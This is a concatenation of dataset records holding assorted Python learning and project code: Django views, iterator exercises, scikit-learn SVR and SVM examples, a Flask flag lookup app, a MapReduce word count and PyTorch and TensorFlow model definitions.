send_mail('Restaurant - Invitation', text_to_send, 'vdragan1993@gmail.com', [friend_guest.user.username],\n fail_silently=False)\n print(\"Success! Mail sent to: \" + str(friend_guest))\n # all finished\n return HttpResponseRedirect(reverse('restaurant:myreservations', args=(guest_id, )))\n\n\n\n@login_required(login_url='/')\ndef showinvitation(request, guest_id, reservation_id, visit_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_reservation = get_object_or_404(Reservation, pk=reservation_id)\n this_visit = get_object_or_404(Visit, pk=visit_id)\n right_now = timezone.now()\n if right_now > this_visit.ending_time:\n return render(request, 'restaurant/reservation_confirm.html', context={\n 'guest': this_guest,\n 'reservation': this_reservation,\n 'visit': this_visit,\n 'show': False,\n 'error_message': \"Time's up!\"\n })\n else:\n if this_visit.confirmed:\n return render(request, 'restaurant/reservation_confirm.html', context={\n 'guest': this_guest,\n 'reservation': this_reservation,\n 'visit': this_visit,\n 'show': False,\n 'info_message': \"Invitation already confirmed!\"\n })\n else:\n return render(request, 'restaurant/reservation_confirm.html', context={\n 'guest': this_guest,\n 'reservation': this_reservation,\n 'visit': this_visit,\n 'show': True\n })\n\n\n@login_required(login_url='/')\ndef acceptinvitation(request, guest_id, reservation_id, visit_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_reservation = get_object_or_404(Reservation, pk=reservation_id)\n this_visit = get_object_or_404(Visit, pk=visit_id)\n new_visit = Visit.objects.get(pk=visit_id)\n new_visit.confirmed = True\n new_visit.save()\n print(\"Success! Confirmed Visit: \" + str(this_visit))\n return render(request, 'restaurant/reservation_confirm.html', context={\n 'guest': this_guest,\n 'reservation': this_reservation,\n 'visit': this_visit,\n 'info_message': \"Invitation Accepted!\"\n })","sub_path":"restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":39261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288766914","text":"import re\nimport reprlib\n\nRE_WORD = re.compile('\\w+')\n\n'''\nclass Sentence:\n def __init__(self, text:str):\n self.text = text\n self.words = RE_WORD.findall(text)\n \n def __getitem__(self, index:int) -> 'item':\n return self.words[index]\n \n def __len__(self) -> int:\n return len(self.words)\n \n def __repr__(self) ->str:\n return 'Sentence(%s)' % reprlib.repr(self.text)\n \n def __iter__(self):\n return SentenceIterator(self.words)\n \nclass SentenceIterator:\n def __init__(self, words):\n self.words = words\n self.index = 0\n \n def __next__(self):\n try:\n word = self.words[self.index]\n except IndexError:\n raise StopIteration()\n self.index += 1\n return word\n \n def __iter__(self):\n return self\n'''\n\n'''\nclass Sentence:\n def __init__(self, text):\n self.text = text\n self.words = RE_WORD.findall(text)\n \n def __repr__(self):\n return 'Sentence(%s)' % reprlib.repr(self.text)\n \n def __iter__(self):\n for word in self.words:\n yield word\n return\n'''\n\nclass Sentence:\n def __init__(self,text):\n self.text = text\n \n def __repr__(self):\n return 'Sentence(%s)' % reprlib.repr(self.text)\n \n def __iter__(self):\n #for match in RE_WORD.finditer(self.text):\n # yield match.group()\n return (match.group() for match in RE_WORD.finditer(self.text))\n\ns = Sentence('\"The time has come,\" the Walrus said,')\nprint(s)\n\nfor word in s:\n print(word)\n\n#print(s[1])\n\ns = 'ABC'\n\nit = iter(s)\n\nwhile True:\n try:\n print(next(it))\n except StopIteration:\n del it\n break\n\n\nclass ArithmeticProgression:\n def __init__(self, begin, step, end = None):\n self.begin = begin\n self.step = step\n self.end = end \n \n def __iter__(self):\n result = type(self.begin + self.step)(self.begin)\n forever = self.end is None\n index = 0\n while forever or result < self.end:\n yield result\n index += 1\n result = self.begin + self.step * index\n\nimport itertools\ngen = itertools.count(1,.5)\n\nprint(next(gen))\nprint(next(gen))\nprint(next(gen))\n\ngen = itertools.takewhile(lambda n: n < 3, itertools.count(1,0.5))\nprint(list(gen))\n\n\ndef aritprog_gen(begin,step,end=None) -> iter:\n first = type(begin + step)(begin)\n ag_gen = itertools.count(first,step)\n if end is not None:\n ag_gen = itertools.takewhile(lambda n:n max_reward:\n max_reward = total_reward\n \n print(\"\\n Episodio {} finalizado con {} iteraciones, Recompensa= {}, Recompenda media= {}, Mejor recompensa= {}\".\n format(episode, step+1, total_reward, np.mean(episode_rewards), max_reward))\n \n if agent.memory.get_size() > 100:\n agent.replay_experience(32)\n \n break\n \n env.close()","sub_path":"swallowQLearner.py","file_name":"swallowQLearner.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341387460","text":"# append\r\na = [1, 2, 3, 4]\r\na.append(5)\r\nprint(a)\r\n\r\n# sort\r\n\r\na = [1, 4, 5, 2, 6, 8, 2, 9, 4]\r\na.sort(reverse=True)\r\nprint(a)\r\n\r\n# reverse\r\na.reverse()\r\nprint(a)\r\n\r\n# index\r\nprint(a.index(4))\r\n\r\n# insert\r\na = [1, 4, 5, 2, 6, 8, 2, 9, 4]\r\na.insert(2,\"4\")\r\nprint(a)\r\n\r\na = [1, 4, 5, 2, 6, 8, 2, 9, 4]\r\nb = a[:2]\r\nc = a[2:]\r\nprint(b + [4, '4'] + c)\r\n\r\na.remove(2)\r\nprint(a)\r\n\r\n# pop\r\nlst = [1, 2, 3, 4, 5, 6, 7]\r\nlst.pop()\r\nprint(lst.pop)\r\n\r\n# extend 와 +의 차이\r\n# +는 원본이 그대로 보존되나, extend 는 원본이 보존되지 않는다.\r\n# 주의, append 는 요소로써 추가하는 것이다.\r\n\r\n\r\nlst = [3, 4, 'C', 'd']\r\nPop = lst.pop(2)\r\n\r\nprint(Pop)\r\n\r\n\r\n# list 함수 안에서 index 를 받느냐, element 자체를 받느냐는 구분하지 않아도 된다.\r\n# element 를 받는 함수와 index 함수와 혼용해서 쓴다면 index 를 받는 것 처럼 쓸 수 있기 때문이다.\r\n\r\n\r\n\r\n","sub_path":"sample5.py","file_name":"sample5.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651225012","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views.generic import TemplateView, ListView, DetailView, DeleteView, UpdateView\nfrom .models import Tweet\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass BaseView(TemplateView):\n template_name = 'blog_base.html'\n\nclass BlogListView(ListView):\n template_name = 'List_view.html'\n context_object_name = 'lists'\n queryset = Tweet.objects.all()\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['data']=Tweet.object.get_matts_post(1)\n return context\nclass UserList(ListView):\n template_name = 'User_List_view.html'\n context_object_name = 'user_lists'\n queryset = User.objects.all()\nclass UserDetail_View(DetailView):\n template_name = 'User_detail_view.html'\n context_object_name = 'user_detail'\n queryset = User.objects.all()\n\n","sub_path":"User_profile/user_profile/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"507517757","text":"#svr regression\r\n\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('Position_Salaries.csv')\r\nX = dataset.iloc[:, 1:2].values\r\ny = dataset.iloc[:, -1:].values\r\n\r\n# Splitting the dataset into the Training set and Test set\r\n\"\"\"from sklearn.cross_validation import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\"\"\"\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nsc_y = StandardScaler()\r\nX = sc_X.fit_transform(X)\r\ny = sc_y.fit_transform(y)\r\n\r\n#svr regression model note: svr model donot do feture scaling with its own as it is less known class\r\nfrom sklearn.svm import SVR\r\nregressor=SVR(kernel='rbf',gamma='auto')\r\nregressor.fit(X,y)\r\n\r\n# Predicting a new result\r\ny_pred=sc_y.inverse_transform(regressor.predict(sc_X.fit_transform(np.array([[6.5]]))))\r\n\r\n# Visualising the Regression results\r\nplt.scatter(X, y, color = 'red',label='actual stat')\r\nplt.plot(X, regressor.predict(X), color = 'blue',label='predicted stat')\r\nplt.legend()\r\nplt.title('Truth or Bluff (SVR Model)')\r\nplt.xlabel('Position level')\r\nplt.ylabel('Salary')\r\nplt.show()","sub_path":"svr_self.py","file_name":"svr_self.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"302292072","text":"from flask import Flask\nfrom flask import request\nfrom flask import render_template\nimport requests\n\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = False\n\n\n@app.route(\"/\", methods=['POST', 'GET'])\ndef home_view():\n if request.method == 'POST':\n country = request.form['country']\n try:\n url_for_request = f'https://restcountries.eu/rest/v2/name/{country}'\n response = requests.get(url_for_request)\n data = response.json()[0]\n url = data.get('flag')\n except:\n return render_template('error.html', name=country)\n return render_template('flag.html', url=url)\n return render_template('home.html')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132803591","text":"''' Layers\n This file contains various layers for the BigGAN models.\n'''\nimport functools\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.nn import Parameter as P\nfrom torch.autograd import Variable\n\n\nfrom layer_conv_select_generate_mask import *\nfrom layer_recon import *\n#################################################\n# idea: convolutional selection #\n#################################################\n\"\"\"perform hypercolumn sparsity since within each scope\"\"\"\n\nclass NeuralConvSelection(nn.Module):\n \"\"\"conv select\"\"\"\n def __init__(self, ch, resolution, kernel_size, vc_dict_size=100, no_attention=False, hard_selection=False, which_mask=\"1.0\", \\\n sparse_vc_prob_interaction=4, vc_type=\"parts\", test=False, pull_vc_activation=0.25):\n super(NeuralConvSelection, self).__init__()\n self.kernel_size = kernel_size\n self.ch = ch\n self.which_mask = which_mask\n self.test = test \n self.pull_vc_activation = pull_vc_activation\n if which_mask == '1.0':\n self.generate_mask = GenerateMask(ch, resolution=kernel_size, or_cadidate=vc_dict_size, no_attention=no_attention) # shared generate mask module, generate a weighted mask for \n elif float(which_mask) >= 2.0 and (float(which_mask) < 3.0):\n self.generate_mask = GenerateMask_2_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size) # shared generate mask module, generate a weighted mask for \n self.integrate_mask_activation = nn.Sequential(\n nn.Linear(ch + kernel_size * kernel_size, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.Tanh()\n )\n elif (float(which_mask) >= 3.0) and (float(which_mask) < 5.0):\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, sparse_vc_prob_interaction=sparse_vc_prob_interaction, vc_type=vc_type) # shared generate mask module, generate a weighted mask for \n self.integrate_mask_activation = nn.Sequential(\n nn.Linear(ch + kernel_size * kernel_size, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.Tanh()\n )\n elif (float(which_mask) >= 5.0) and (float(which_mask) < 6.0):\n print(\"=== in select build 5.0 mask ===\")\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, sparse_vc_prob_interaction=sparse_vc_prob_interaction, \n vc_type=vc_type, reg_entropy=True) # regularize the negative entropy of vc prob\n self.integrate_mask_activation = nn.Sequential(\n nn.Linear(ch + kernel_size * kernel_size, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.Tanh()\n )\n elif float(which_mask) >= 6.0 and (float(which_mask) < 7.0):\n if float(which_mask) == 6.1:\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction, \\\n warmup=54360, \n vc_type=vc_type, reg_entropy=True, no_map=True, pull_vc_activation=[self.pull_vc_activation,])\n elif float(which_mask) == 6.2:\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction, \\\n warmup=54360, \n vc_type=vc_type, reg_entropy=True, no_map=True, \\\n pull_vc_activation=[self.pull_vc_activation,], replace_activation=True)\n else:\n self.generate_mask = GenerateMask_3_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, sparse_vc_prob_interaction=sparse_vc_prob_interaction, \n vc_type=vc_type, reg_entropy=True, no_map=True) # regularize the negative entropy of vc prob\n elif float(which_mask) >= 7.0 and (float(which_mask) < 8.0):\n # condition on vc to force network learn different output\n if float(which_mask) == 7.0:\n self.generate_mask = GenerateMask_4_0(ch, resolution=kernel_size, or_cadidate=vc_dict_size, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction, \\\n warmup=543600,\n vc_type=vc_type, reg_entropy=True, no_map=True, pull_vc_activation=[self.pull_vc_activation,])\n self.integrate_vc_activation = nn.Sequential(\n nn.Linear(ch * 2, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.Tanh()\n )\n self.force_output_contain_vc = nn.Sequential(\n nn.Linear(ch, int(ch * 3)),\n nn.LeakyReLU(0.2),\n nn.Linear(int(ch * 3), ch),\n nn.LeakyReLU(0.2),\n )\n else:\n raise NotImplementedError(f\"which_mask {which_mask} is not implemented in NeuralConvSelection module\")\n \n self.unfold = nn.Unfold(kernel_size=(kernel_size, kernel_size), stride=3)\n\n def forward(self, x):\n \"\"\"\n x: [n, c, h, w]\n output: [n, L, c]\n \"\"\"\n n, c, h, w = x.shape\n x = self.unfold(x) # [n, c * kernel * kernel, L]\n L = x.shape[2]\n x = torch.transpose(x, 1, 2).view(n, -1, c, self.kernel_size, self.kernel_size) # [n, L, c, kernel, kernel]\n # print(f\"x shape before mask {x.shape}\")\n if self.which_mask == '1.0':\n x_mask, prob_vector, prob_vector_previous, origin_dot_product = self.generate_mask(x) # [n * L, 1, kernel, kernel]\n \n x = (x_mask * x.reshape(-1, c, self.kernel_size, self.kernel_size)).sum((2,3)) # [n * L, c, kernel, kernel] -> [n * L, c]\n x = x.view(-1, L, c) # [n, L, c]\n return x, (x_mask.reshape(n, L, self.kernel_size, self.kernel_size), prob_vector.reshape(n, L, -1), prob_vector_previous.reshape(n, L, -1), \n origin_dot_product.reshape(n, L, -1, self.kernel_size, self.kernel_size))\n elif (float(self.which_mask) >= 2.0) and (float(self.which_mask) < 5.0):\n vc, sim_map_max = self.generate_mask(x) # [n * L, c], [n * L, 1, h, w]\n integrate_input = torch.cat([vc, sim_map_max.view(n * L, -1)], dim=1)\n # print(f\"input *************************** {integrate_input.sum()}\")\n integrated_output = self.integrate_mask_activation(integrate_input) # [n * L, c]\n # print(f\"integreated mask activation ===================== {integrated_output.mean()}\")\n return integrated_output.view(-1, L, c), None # [n, L, c]\n elif (float(self.which_mask) >= 5.0) and (float(self.which_mask) < 6.0):\n # introduce maximun entropy \n # print(f\"===== test? {self.test}\")\n vc, sim_map_max, neg_entorpy = self.generate_mask(x, test=self.test) # [n * L, c], [n * L, 1, h, w], scaler\n # print(f\"sim_map_max {sim_map_max.shape}\")\n # print(f\"vc {vc.shape}\")\n integrate_input = torch.cat([vc, sim_map_max.view(-1, self.kernel_size * self.kernel_size)], dim=1)\n # print(f\"input *************************** {integrate_input.sum()}\")\n integrated_output = self.integrate_mask_activation(integrate_input) # [n * L, c]\n # print(f\"integreated mask activation ===================== {integrated_output.mean()}\")\n return integrated_output.view(-1, L, c), neg_entorpy # [n, L, c], scaler\n elif float(self.which_mask) >= 6.0 and (float(self.which_mask) < 7.0):\n # introduce maximun entropy \n vc, sim_map_max, neg_entorpy = self.generate_mask(x, test=self.test) # [n * L, c], None, scaler\n \n # print(f\"integreated mask activation ===================== {integrated_output.mean()}\")\n return vc.view(-1, L, c), neg_entorpy # [n, L, c], scaler\n elif float(self.which_mask) >= 7.0:\n if float(self.which_mask) == 7.0:\n vc_activation, sim_map_max, additional = self.generate_mask(x, test=self.test) # [n * L, 2c], [n * L, 1, h, w], scaler\n # integrate_input\n integrated_output = self.integrate_vc_activation(vc_activation) # [n *L, 2c] -> [n *L, c]\n # make the integrated_output contain vc information\n approx_vc = self.force_output_contain_vc(integrated_output)\n loss_use_vc = ((approx_vc - vc_activation[:, c:])**2).mean() * 100\n print(f\"loss_use_vc {loss_use_vc}\")\n additional += loss_use_vc\n return integrated_output.view(-1, L, c), additional\n\n\n\n\n\n#################################################\n# Conv Select main #\n#################################################\nclass SparseNeuralConv(nn.Module):\n \"\"\"main class to conv select and conv reconstruct\"\"\"\n def __init__(self, topk, ch, resolution, kernel_size, vc_dict_size, no_attention_select=False, sparse_vc_interaction=0, sparse_vc_prob_interaction=4, mode=\"1.0\",\n test=False):\n super(SparseNeuralConv, self).__init__()\n self.myid = \"conv_sparse_vc_recover\"\n self.mode = mode\n self.test = test\n \n if (float(self.mode) < 4.0) or (float(self.mode) >= 5.0 and float(self.mode) < 8.0):\n self.select = NeuralConvSelection(ch, resolution, kernel_size, vc_dict_size, no_attention=no_attention_select, which_mask=mode, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction, \\\n test=self.test)\n self.recon = NeuralConvRecon(ch, resolution, kernel_size)\n self.sparse_vc_interaction = sparse_vc_interaction\n if self.sparse_vc_interaction:\n self.attention_modules = nn.ModuleList([BatchedVectorAttention(ch, max(ch // 5, 1)) for _ in range(self.sparse_vc_interaction)])\n \n elif float(self.mode) >= 4.0 and float(self.mode) < 5.0:\n \"\"\"use multiple pathway to help with\"\"\"\n # for objects\n self.select1 = NeuralConvSelection(ch, resolution, kernel_size, vc_dict_size, no_attention=no_attention_select, which_mask=mode, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction,\n vc_type=\"parts\")\n self.recon1 = NeuralConvRecon(ch, resolution, kernel_size)\n self.sparse_vc_interaction = sparse_vc_interaction\n if self.sparse_vc_interaction:\n self.attention_modules1 = nn.ModuleList([BatchedVectorAttention(ch, max(ch // 5, 1)) for _ in range(self.sparse_vc_interaction)])\n \n # for texture\n self.select2 = NeuralConvSelection(ch, resolution, kernel_size, vc_dict_size, no_attention=no_attention_select, which_mask=mode, \\\n sparse_vc_prob_interaction=sparse_vc_prob_interaction,\n vc_type=\"texture\")\n self.recon2 = NeuralConvRecon(ch, resolution, kernel_size)\n self.sparse_vc_interaction = sparse_vc_interaction\n if self.sparse_vc_interaction:\n self.attention_modules2 = nn.ModuleList([BatchedVectorAttention(ch, max(ch // 5, 1)) for _ in range(self.sparse_vc_interaction)])\n\n\n def forward(self, x, eval_=False, select_index=0, device=\"cuda\"):\n \"\"\"\n x: [n, c, h, w]\n output: [n, c, h, w]\n \"\"\"\n ####### 1.0 #########\n if self.mode == '1.0':\n vcs, (mask_x, prob_vector, previous_prob_vector, origin_map) = self.select(x) # [n, L, c]\n \n if self.sparse_vc_interaction:\n pass\n\n if eval_:\n n, L, c = vcs.shape\n if type(select_index) == int:\n select_index = [select_index]\n select_indexs = select_index # if len(select_index) >= 2 else range(select_index[0])\n select_indexs = torch.LongTensor([i for i in select_indexs]).view(-1, 1).unsqueeze(0).repeat(n, 1, c).to(device)\n # index = (torch.ones(c, dtype=torch.long) * select_index).unsqueeze(0).unsqueeze(0).expand((n,1,c)).to(device)\n vcs = vcs * torch.zeros_like(vcs).scatter_(1, select_indexs, 1.).to(device)\n print(f\"Mask out vcs, testing vc {select_index}\")\n\n x = self.recon(vcs) # [n, c, h, w]\n return x, (mask_x, prob_vector, previous_prob_vector, origin_map)\n \n ####### 2.0+ & 3.0+ #########\n elif float(self.mode) >= 2.0 and float(self.mode) < 4.0:\n\n vcs, _ = self.select(x) # [n, L, c]\n if self.sparse_vc_interaction:\n for attend in self.attention_modules:\n vcs = attend(vcs) # [n, L, c]\n x = self.recon(vcs) # [n, c, h, w]\n return x, None\n elif float(self.mode) >= 4.0 and float(self.mode) < 5.0:\n # first parts\n vcs, _ = self.select1(x) # [n, L, c]\n if self.sparse_vc_interaction:\n for attend in self.attention_modules1:\n vcs = attend(vcs) # [n, L, c]\n x1 = self.recon1(vcs) # [n, c, h, w]\n\n # second parts\n vcs, _ = self.select2(x) # [n, L, c]\n if self.sparse_vc_interaction:\n for attend in self.attention_modules2:\n vcs = attend(vcs) # [n, L, c]\n x2 = self.recon2(vcs) # [n, c, h, w]\n\n x = x1 + x2 \n return x, None # [n, c, h, w]\n elif float(self.mode) >= 5.0 and float(self.mode) < 9.0:\n # in 5.0, introduce maximum entropy princinple\n # print(\"IN 5.0\")\n vcs, neg_entorpy = self.select(x) # [n, L, c]\n # print(\"neg_entorpy\", neg_entorpy.item())\n if self.sparse_vc_interaction:\n for attend in self.attention_modules:\n vcs = attend(vcs) # [n, L, c]\n x = self.recon(vcs) # [n, c, h, w]\n return x, neg_entorpy\n\n\n\n\n\n \n\n\n\n","sub_path":"layer_conv_select.py","file_name":"layer_conv_select.py","file_ext":"py","file_size_in_byte":15097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"296778807","text":"# General testing file\nimport sys\nsys.path.append('rplugin/python3') # If calling script from root\nsys.path.append('../rplugin/python3') # If calling script from /tests/\n\nfrom vppm import *\n\ndef testSearch():\n # Search for a plugin\n searcher = PluginSearch()\n results = searcher.search(\"test\")\n\n print (results)\n\n# Call the tests\ntestSearch()\n","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"17016476","text":"import MapReduce\nimport sys\n\n\"\"\"\nWord Count Example in the Simple Python MapReduce Framework\n\"\"\"\n\n#create a MapReduce object that is used to pass data \n#between the map function and the reduce function\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\n#the mapper function tokenizes each document and emits a key-value pair\n#The key is a word formatted as a string and the value is the integer 1 to indicate an occurrence of word\n\ndef mapper(record):\n # key: document identifier\n # value: document contents\n key = record[0]\n value = record[1]\n words = value.split()\n for w in words:\n mr.emit_intermediate(w, 1)\n \n#the reducer function sums up the list of occurrence counts and emits a count for word.\n#Since the mapper function emits the integer 1 for each word, each element in the list_of_values is the integer 1.\n\ndef reducer(key, list_of_values):\n # key: word\n # value: list of occurrence counts\n total = 0\n for v in list_of_values:\n total += v\n mr.emit((key, total))\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"assignment3/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"202227661","text":"from sklearn.neural_network import MLPRegressor\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, cross_val_score\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error, r2_score, confusion_matrix, accuracy_score, classification_report, roc_auc_score,roc_curve\nfrom sklearn.svm import SVC\n\ndiabetes = pd.read_csv('../../reading_data/diabetes.csv')\ndf = diabetes.copy()\ndf = df.dropna()\n\ny = df[\"Outcome\"]\nX = df.drop([\"Outcome\"], axis = 1)\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.30)\n\nsvm_model = SVC(kernel=\"rbf\").fit(X_train, y_train)\ny_pred = svm_model.predict(X_test)\n\nprint('Accuracy:', accuracy_score(y_pred, y_test))\nprint('Rapor:', classification_report(y_pred, y_test))\n\nparams = {\n \"C\": [0.0001, 0.001, 0.1,1,5,10,100],\n \"gamma\" : [0.0001, 0.001, 0.1,1,5,10,100]\n}\n\n# from sklearn.model_selection import GridSearchCV\n\n# svc_cv = GridSearchCV(svm_model, params, cv=10, verbose=2, n_jobs=-1)\n# svc_cv.fit(X_train, y_train)\n# print(svc_cv.best_params_)\n\nsvm_tuned_model = SVC(kernel=\"linear\", C=9, gamma=0.0001).fit(X_train, y_train)\ny_tuned_pred = svm_tuned_model.predict(X_test)\n\nprint('Tuned Accuracy:', accuracy_score(y_tuned_pred, y_test))\nprint('Tuned Rapor:', classification_report(y_tuned_pred, y_test))\n\n","sub_path":"machine-learning/classifers/non-linear-svc.py","file_name":"non-linear-svc.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"544869180","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport tensorflow as tf\nimport os\n\n#定义神经网络的参数 784个输入特征 10中分类 中间层有500个结点\nINPUT_NODE = 784\nOUTPUT_NODE = 10\n\n#传入的图片数据 28*28*1 的三维矩阵 标签为10维矩阵\nIMAGE_SIZE = 28\nNUM_CHANNELS = 1\nNUM_LABELS = 10\n#第一层卷积神经网络的深度和尺寸\nCONV1_DEEP = 32\nCONV1_SIZE = 5\n#第二层卷积神经网络的深度和尺寸\nCONV2_DEEP = 64\nCONV2_SIZE = 5\n#全连接层节点个数\nFC_SIZE = 512\n\n#LAYER1_NODE = 500\n\n# 定义卷积神经网络的前向传播过程。这里添加了一个新的参数train,用于区别训练过程和测试过程。在这个程序 中将用到dropout方法\n# dropout可以进一步提升模型可靠性并防止过拟合(dropout过程只在训练时使用)\ndef inference(input_tensor, train, regularizer):\n\n # 声明第一层卷积层的变量并实现前向传播过程。\n # 通过使用不同层的命名空间来隔离不同层的变量,让每一层中的变量命名只需要考虑在当前层的作用,\n # 不需要担心重名的问题。\n # 和标准LeNet-5模型不大一样,这里定义卷积层输入28 * 28 * 1 的原始MNIST图片像素。\n # 卷积层中使用全0填充,输出28 * 28 * 32 矩阵\n with tf.variable_scope('layer1_conv1'): #通过tf.get_variable()为变量名指定命名空间\n conv1_weights = tf.get_variable(\n 'weight',[CONV1_SIZE, CONV1_SIZE, NUM_CHANNELS,CONV1_DEEP],\n initializer = tf.truncated_normal_initializer(stddev=0.1))\n conv1_biases = tf.get_variable(\n 'bias',[CONV1_DEEP],initializer = tf.constant_initializer(0.0))\n\n # 使用边长5, 深度32的过滤器,移动步长1,使用全0填充\n conv1 = tf.nn.conv2d(\n input_tensor, conv1_weights, strides=[1,1,1,1], padding='SAME')\n relu1 = tf.nn.relu(tf.nn.bias_add(conv1, conv1_biases))\n\n # 实现第二层池化层的前向传播过程。使用最大池化,过滤器边长2,使用全0填充,移动步长2.\n # 输入 28 * 28 * 32 输出 14 * 14 * 32\n with tf.name_scope('layer2_pool1'):\n pool1 = tf.nn.max_pool(\n relu1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\n # 声明第三层卷积层的变量实现前向传播过程。\n # 输入 14 * 14 * 32 输出 14 * 14 * 64\n with tf.variable_scope('layer3_conv2'):\n conv2_weights = tf.get_variable(\n 'weight', [CONV2_SIZE,CONV2_SIZE,CONV1_DEEP,CONV2_DEEP],\n initializer = tf.truncated_normal_initializer(stddev=0.1))\n conv2_biases = tf.get_variable(\n 'bias',[CONV2_DEEP], initializer = tf.constant_initializer(0.0))\n\n # 使用边长5, 深度64的过滤器,移动步长1, 全0填充\n conv2 = tf.nn.conv2d(pool1, conv2_weights, strides=[1,1,1,1], padding='SAME')\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, conv2_biases))\n \n # 实现第四层池化层的前向传播过程。\n # 输入14 * 14 * 64 输出 7 * 7 * 64\n with tf.name_scope('layer4_pool2'):\n pool2 = tf.nn.max_pool(\n relu2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\n # 将第四层池化层的输出转化为第五层全连接层的输入格式。\n # 将 7 * 7 * 64 的矩阵拉直成一个向量。\n # pool2.get_shape()函数返回的是一个元组,可以等到输出矩阵维度,通过as_list()操作转换成list\n # 每一层神经网络的输入输出都是一个batch的矩阵,这里得到的维度包含一个batch数据的个数\n pool_shape = pool2.get_shape().as_list()\n\n # 计算将矩阵拉直成向量之后的长度,就是矩阵长宽与深度的乘积。\n # pool_shape[0]是一个batch中数据的个数。\n nodes = pool_shape[1] * pool_shape[2] * pool_shape[3]\n\n # 通过tf.reshape函数将第四层的输出变成一个batch的向量。\n reshaped = tf.reshape(pool2, [pool_shape[0], nodes]) #[1, 7X7X64]\n\n # 声明第五层全连接层的变量并实现前向传播过程.\n # 3136->512 输入是拉直后的向量,长度3136. 输出向量,长度512\n # 使用了dropout. dropout一般在全连接层使用.\n with tf.variable_scope('layer5_fc1'):\n fc1_weights = tf.get_variable(\n 'weight', [nodes, FC_SIZE], \n initializer = tf.truncated_normal_initializer(stddev=0.1))\n # 只有全连接层的权重需要加入正则化\n # 正则化的目的是为了防止过拟合\n if regularizer != None:\n tf.add_to_collection('losses', regularizer(fc1_weights))\n #将权重矩阵fc1_weights所对应的正则项加入到集合losses中 \n fc1_biases = tf.get_variable('bias', [FC_SIZE], initializer=tf.constant_initializer(0.1))\n fc1 = tf.nn.relu(tf.matmul(reshaped, fc1_weights) + fc1_biases)\n\n #train 为传入决定是否用dropout的参数\n if train:\n fc1 = tf.nn.dropout(fc1, 0.5)\n\n # 声明第六层全连接层的变量,并实现前向传播过程\n # 512->10 输出通过softmax 后就得到最后的分类结果\n with tf.variable_scope('Layer6_fc2'):\n fc2_weights = tf.get_variable(\n 'weight', [FC_SIZE, NUM_LABELS], initializer =\n 